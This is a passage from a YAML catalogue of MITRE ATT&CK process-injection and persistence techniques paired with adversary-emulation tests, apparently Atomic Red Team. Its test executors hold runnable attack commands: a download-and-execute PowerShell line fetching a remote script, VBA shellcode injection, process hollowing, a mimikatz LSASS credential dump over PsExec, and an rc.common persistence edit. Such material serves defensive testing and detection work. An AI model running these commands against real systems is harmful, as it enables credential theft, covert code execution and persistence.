over” for the Winnti - Group. Retrieved August 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Print Processors - description: "Adversaries may abuse print processors to run malicious DLLs during - system boot for persistence and/or privilege escalation. Print processors - are DLLs that are loaded by the print spooler service, spoolsv.exe, during - boot. \n\nAdversaries may abuse the print spooler service by adding print - processors that load malicious DLLs at startup. A print processor can be installed - through the AddPrintProcessor API call with an account that has - SeLoadDriverPrivilege enabled. Alternatively, a print processor - can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet - or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: - e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry - key that points to the DLL. For the print processor to be correctly installed, - it must be located in the system print-processor directory that can be found - with the GetPrintProcessorDirectory API call.(Citation: Microsoft - AddPrintProcessor May 2018) After the print processors are installed, the - print spooler service, which starts during boot, must be restarted in order - for them to run.(Citation: ESET PipeMon May 2020) The print spooler service - runs under SYSTEM level permissions, therefore print processors installed - by an adversary may run under elevated privileges." - id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T16:05:36.344Z' - created: '2020-10-05T13:24:49.780Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations. - - Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious. - x_mitre_data_sources: - - Process monitoring - - Windows Registry - - File monitoring - - DLL monitoring - - API monitoring - x_mitre_contributors: - - Mathieu Tartare, ESET - x_mitre_platforms: - - Windows - atomic_tests: [] - T1055.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.009 - url: https://attack.mitre.org/techniques/T1055/009 - - url: http://hick.org/code/skape/papers/needle.txt - description: skape. (2003, January 19). Linux x86 run-time process manipulation. - Retrieved December 20, 2017. - source_name: Uninformed Needle - - source_name: GDS Linux Injection - url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html - description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code - Injection Without Ptrace(2). Retrieved February 21, 2020. - - source_name: DD Man - url: http://man7.org/linux/man-pages/man1/dd.1.html - description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved - February 21, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Proc Memory - description: "Adversaries may inject malicious code into processes via the /proc - filesystem in order to evade process-based defenses as well as possibly elevate - privileges. Proc memory injection is a method of executing arbitrary code - in the address space of a separate live process. \n\nProc memory injection - involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) - then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. - Each running process has its own directory, which includes memory mappings. - Proc memory injection is commonly performed by overwriting the target processes’ - stack using memory mappings provided by the /proc filesystem. This information - can be used to enumerate offsets (including the stack) and gadgets (or instructions - within the program that can be used to build a malicious payload) otherwise - hidden by process memory protections such as address space layout randomization - (ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps - can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux - Injection)(Citation: DD Man) \n\nOther techniques such as [LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006) - may be used to populate a target process with more available gadgets. Similar - to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc - memory injection may target child processes (such as a backgrounded copy of - sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of - another process may allow access to the process's memory, system/network resources, - and possibly elevated privileges. Execution via proc memory injection may - also evade detection from security products since the execution is masked - under a legitimate process. " - id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:25:55.331Z' - created: '2020-01-14T01:34:10.588Z' - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: "File system monitoring can determine if /proc files are - being modified. Users should not have permission to modify these in most cases. - \n\nAnalyze process behavior to determine if a process is performing actions - it usually does not, such as opening network connections, reading files, or - other suspicious actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Linux - atomic_tests: [] - T1055.013: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.013 - url: https://attack.mitre.org/techniques/T1055/013 - - url: https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx - description: Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December - 20, 2017. - source_name: Microsoft TxF - - url: https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx - description: Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, - 2017. - source_name: Microsoft Basic TxF Concepts - - url: https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx - description: Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved - December 20, 2017. - source_name: Microsoft Where to use TxF - - url: https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf - description: 'Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: - Process Doppelgänging. Retrieved December 20, 2017.' - source_name: BlackHat Process Doppelgänging Dec 2017 - - url: https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/ - description: hasherezade. (2017, December 18). Process Doppelgänging – a new - way to impersonate a process. Retrieved December 20, 2017. - source_name: hasherezade Process Doppelgänging Dec 2017 - - url: https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx - description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved - December 20, 2017. - source_name: Microsoft PsSetCreateProcessNotifyRoutine routine - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Process Doppelgänging - description: "Adversaries may inject malicious code into process via process - doppelgänging in order to evade process-based defenses as well as possibly - elevate privileges. Process doppelgänging is a method of executing arbitrary - code in the address space of a separate live process. \n\nWindows Transactional - NTFS (TxF) was introduced in Vista as a method to perform safe file operations. - (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted - handle to write to a file at a given time. Until the write handle transaction - is terminated, all other handles are isolated from the writer and may only - read the committed version of the file that existed at the time the handle - was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, - TxF performs an automatic rollback if the system or application fails during - a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, - the TxF application programming interface (API) is still enabled as of Windows - 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may - abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). - Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), - process doppelgänging involves replacing the memory of a legitimate process, - enabling the veiled execution of malicious code that may evade defenses and - detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored - API functions such as NtUnmapViewOfSection, VirtualProtectEx, - and SetThreadContext. (Citation: BlackHat Process Doppelgänging - Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat - Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction - using a legitimate executable then overwrite the file with malicious code. - These changes will be isolated and only visible within the context of the - transaction.\n* Load – Create a shared section of memory and load the malicious - executable.\n* Rollback – Undo changes to original executable, effectively - removing malicious code from the file system.\n* Animate – Create a process - from the tainted section of memory and initiate execution.\n\nThis behavior - will likely not result in elevated privileges since the injected process was - spawned from (and thus inherits the security context) of the injecting process. - However, execution via process doppelgänging may evade detection from security - products since the execution is masked under a legitimate process. " - id: attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:27:21.304Z' - created: '2020-01-14T17:19:50.978Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_data_sources: - - File monitoring - - Process monitoring - - API monitoring - x_mitre_permissions_required: - - Administrator - - SYSTEM - - User - x_mitre_detection: |- - Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017) - - Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017) - - Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - atomic_tests: [] - T1055.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.012 - url: https://attack.mitre.org/techniques/T1055/012 - - url: http://www.autosectools.com/process-hollowing.pdf - description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, - 2014. - source_name: Leitch Hollowing - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Process Hollowing - description: "Adversaries may inject malicious code into suspended and hollowed - processes in order to evade process-based defenses. Process hollowing is a - method of executing arbitrary code in the address space of a separate live - process. \n\nProcess hollowing is commonly performed by creating a process - in a suspended state then unmapping/hollowing its memory, which can then be - replaced with malicious code. A victim process can be created with native - Windows API calls such as CreateProcess, which includes a flag - to suspend the processes primary thread. At this point the process can be - unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection - \ before being written to, realigned to the injected code, and resumed via - VirtualAllocEx, WriteProcessMemory, SetThreadContext, - then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: - Endgame Process Injection July 2017)\n\nThis is very similar to [Thread Local - Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new - process rather than targeting an existing process. This behavior will likely - not result in elevated privileges since the injected process was spawned from - (and thus inherits the security context) of the injecting process. However, - execution via process hollowing may also evade detection from security products - since the execution is masked under a legitimate process. " - id: attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:28:08.758Z' - created: '2020-01-14T17:21:54.470Z' - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_permissions_required: - - User - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. Windows API calls - such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, - and those that can be used to modify memory within another process, such as - VirtualAllocEx/WriteProcessMemory, may be used for - this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze - process behavior to determine if a process is performing actions it usually - does not, such as opening network connections, reading files, or other suspicious - actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - identifier: T1055.012 - atomic_tests: - - name: Process Hollowing using PowerShell - auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c - description: | - This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent. - Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1) - supported_platforms: - - windows - input_arguments: - hollow_binary_path: - description: Path of the binary to hollow (executable that will run inside - the sponsor) - type: string - default: C:\Windows\System32\cmd.exe - parent_process_name: - description: Name of the parent process - type: string - default: explorer - sponsor_binary_path: - description: Path of the sponsor binary (executable that will host the binary) - type: string - default: C:\Windows\System32\notepad.exe - spawnto_process_name: - description: Name of the process to spawn - type: string - default: notepad - executor: - command: | - . $PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1 - $ppid=Get-Process #{parent_process_name} | select -expand id - Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose - cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction - Ignore - -' - name: powershell - - name: RunPE via VBA - auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b - description: 'This module executes notepad.exe from within the WINWORD.EXE process - -' - supported_platforms: - - windows - input_arguments: - ms_product: - description: Maldoc application Word - type: String - default: Word - dependency_executor_name: powershell - dependencies: - - description: 'Microsoft #{ms_product} must be installed - -' - prereq_command: | - try { - New-Object -COMObject "#{ms_product}.Application" | Out-Null - $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} - Stop-Process -Name $process - exit 0 - } catch { exit 1 } - get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} - manually to meet this requirement" - -' - executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" - -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" - -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" - name: powershell - T1055: - technique: - id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Process Injection - description: "Adversaries may inject code into processes in order to evade process-based - defenses as well as possibly elevate privileges. Process injection is a method - of executing arbitrary code in the address space of a separate live process. - Running code in the context of another process may allow access to the process's - memory, system/network resources, and possibly elevated privileges. Execution - via process injection may also evade detection from security products since - the execution is masked under a legitimate process. \n\nThere are many different - ways to inject code into a process, many of which abuse legitimate functionalities. - These implementations exist for every major OS but are typically platform - specific. \n\nMore sophisticated samples may perform multiple process injections - to segment modules and further evade detection, utilizing named pipes or other - inter-process communication (IPC) mechanisms as a communication channel. " - external_references: - - source_name: mitre-attack - external_id: T1055 - url: https://attack.mitre.org/techniques/T1055 - - external_id: CAPEC-640 - source_name: capec - url: https://capec.mitre.org/data/definitions/640.html - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: - Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved - December 20, 2017.' - source_name: ArtOfMemoryForensics - - url: https://www.gnu.org/software/acct/ - description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved - December 20, 2017. - source_name: GNU Acct - - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing - description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - - Chapter 7 - System Auditing. Retrieved December 20, 2017. - source_name: RHEL auditd - - url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html - description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. - Retrieved December 20, 2017. - source_name: Chokepoint preload rootkits - - url: https://docs.microsoft.com/sysinternals/downloads/sysmon - description: Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved - December 13, 2017. - source_name: Microsoft Sysmon v6 May 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:28:45.651Z' - created: '2017-05-31T21:30:47.843Z' - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. Windows API calls - such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, - QueueUserAPC/NtQueueApcThread, and those that can - be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017) - \n\nMonitor DLL/PE file events, specifically creation of these binary files - as well as the loading of DLLs into processes. Look for DLLs that are not - recognized or not normally loaded into a process. \n\nMonitoring for Linux - specific calls such as the ptrace system call should not generate large amounts - of data due to their specialized nature, and can be a very effective method - to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) - \ (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload - rootkits) \n\nMonitor for named pipe creation and connection events (Event - IDs 17 and 18) for possible indicators of infected processes with external - modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior - to determine if a process is performing actions it usually does not, such - as opening network connections, reading files, or other suspicious actions - that could relate to post-compromise behavior. " - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - API monitoring - - File monitoring - - DLL monitoring - - Process monitoring - - Named Pipes - x_mitre_contributors: - - Anastasios Pingios - - Christiaan Beek, @ChristiaanBeek - - Ryan Becwar - x_mitre_version: '1.1' - x_mitre_is_subtechnique: false - identifier: T1055 - atomic_tests: - - name: Shellcode execution via VBA - auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 - description: | - This module injects shellcode into a newly created process and executes. By default the shellcode is created, - with Metasploit, for use on x86-64 Windows 10 machines. - - Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office - is required. - supported_platforms: - - windows - dependency_executor_name: powershell - dependencies: - - description: 'The 64-bit version of Microsoft Office must be installed - -' - prereq_command: | - try { - $wdApp = New-Object -COMObject "Word.Application" - $path = $wdApp.Path - Stop-Process -Name "winword" - if ($path.contains("(x86)")) { exit 1 } else { exit 0 } - } catch { exit 1 } - get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) - manually to meet this requirement" - -' - executor: - command: | - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) - Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" - name: powershell - - name: Remote Process Injection in LSASS via mimikatz - auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 - description: | - Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). - It must be executed in the context of a user who is privileged on remote `machine`. - - The effect of `/inject` is explained in - supported_platforms: - - windows - input_arguments: - machine: - description: machine to target (via psexec) - type: string - default: DC1 - mimikatz_path: - description: Mimikatz windows executable - type: path - default: "%tmp%\\mimikatz\\x64\\mimikatz.exe" - psexec_path: - description: Path to PsExec - type: string - default: C:\PSTools\PsExec.exe - dependency_executor_name: powershell - dependencies: - - description: 'Mimikatz executor must exist on disk and at specified location - (#{mimikatz_path}) - -' - prereq_command: | - $mimikatz_path = cmd /c echo #{mimikatz_path} - if (Test-Path $mimikatz_path) {exit 0} else {exit 1} - get_prereq_command: | - $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" - Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force - New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null - Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force - - description: 'PsExec tool from Sysinternals must exist on disk at specified - location (#{psexec_path}) - -' - prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - -' - get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force - New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force - executor: - command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa - /inject /id:500" "exit" - -' - name: command_prompt - elevation_required: false - T1055.008: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.008 - url: https://attack.mitre.org/techniques/T1055/008 - - source_name: PTRACE man - url: http://man7.org/linux/man-pages/man2/ptrace.2.html - description: Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's - Manual. Retrieved February 21, 2020. - - source_name: Medium Ptrace JUL 2018 - url: https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be - description: Jain, S. (2018, July 25). Code injection in running process using - ptrace. Retrieved February 21, 2020. - - source_name: BH Linux Inject - url: https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf - description: Colgan, T. (2015, August 15). Linux-Inject. Retrieved February - 21, 2020. - - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: - Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved - December 20, 2017.' - source_name: ArtOfMemoryForensics - - url: https://www.gnu.org/software/acct/ - description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved - December 20, 2017. - source_name: GNU Acct - - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing - description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - - Chapter 7 - System Auditing. Retrieved December 20, 2017. - source_name: RHEL auditd - - url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html - description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. - Retrieved December 20, 2017. - source_name: Chokepoint preload rootkits - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Ptrace System Calls - description: "Adversaries may inject malicious code into processes via ptrace - (process trace) system calls in order to evade process-based defenses as well - as possibly elevate privileges. Ptrace system call injection is a method of - executing arbitrary code in the address space of a separate live process. - \n\nPtrace system call injection involves attaching to and modifying a running - process. The ptrace system call enables a debugging process to observe and - control another process (and each individual thread), including changing memory - and register values.(Citation: PTRACE man) Ptrace system call injection is - commonly performed by writing arbitrary code into a running process (ex: malloc) - then invoking that memory with PTRACE_SETREGS to set the register - containing the next instruction to execute. Ptrace system call injection can - also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, - which copy data to a specific address in the target processes’ memory (ex: - the current address of the next instruction). (Citation: PTRACE man)(Citation: - Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible - targeting processes with high-privileges, and on some system those that are - non-child processes.(Citation: BH Linux Inject) \n\nRunning code in the context - of another process may allow access to the process's memory, system/network - resources, and possibly elevated privileges. Execution via ptrace system call - injection may also evade detection from security products since the execution - is masked under a legitimate process. " - id: attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:24:56.734Z' - created: '2020-01-14T01:33:19.065Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_data_sources: - - System calls - - Process monitoring - x_mitre_detection: "Monitoring for Linux specific calls such as the ptrace system - call should not generate large amounts of data due to their specialized nature, - and can be a very effective method to detect some of the common process injection - methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: - RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process - behavior to determine if a process is performing actions it usually does not, - such as opening network connections, reading files, or other suspicious actions - that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Linux - atomic_tests: [] - T1037.004: - technique: - id: attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211 - description: |- - Adversaries may use rc.common automatically executed at boot initialization to establish persistence. During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated mechanism in favor of [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) but is currently still used. - - Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user. (Citation: Methods of Mac Malware Persistence) - name: Rc.common - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1037.004 - url: https://attack.mitre.org/techniques/T1037/004 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html - description: Apple. (2016, September 13). Startup Items. Retrieved July 11, - 2017. - source_name: Startup Items - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:46:20.433Z' - created: '2020-01-15T16:25:22.260Z' - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: 'The /etc/rc.common file can be monitored to - detect changes from the company policy. Monitor process execution resulting - from the rc.common script for unusual or unknown applications or behavior. ' - x_mitre_permissions_required: - - root - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1037.004 - atomic_tests: - - name: rc.common - auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de - description: | - Modify rc.common - - [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) - supported_platforms: - - macos - executor: - command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello - World"'' >> /etc/rc.common - -' - elevation_required: true - name: bash - T1547.007: - technique: - created: '2020-01-24T18:15:06.641Z' - modified: '2020-01-24T19:51:37.795Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e - description: "Adversaries may modify plist files to automatically run an application - when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain - applications to be re-opened when a user logs into their machine after reboot. - While this is usually done via a Graphical User Interface (GUI) on an app-by-app - basis, there are property list files (plist) that contain this information - as well located at ~/Library/Preferences/com.apple.loginwindow.plist - and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. - \n\nAn adversary can modify one of these files directly to include a link - to their malicious executable to provide a persistence mechanism each time - the user reboots their machine (Citation: Methods of Mac Malware Persistence)." - name: Re-opened Applications - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.007 - url: https://attack.mitre.org/techniques/T1547/007 - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - File monitoring - x_mitre_detection: Monitoring the specific plist files associated with reopening - applications can indicate when an application has registered itself to be - reopened. - x_mitre_permissions_required: - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1547.007 - atomic_tests: - - name: Re-Opened Applications - auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba - description: | - Plist Method - - [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) - supported_platforms: - 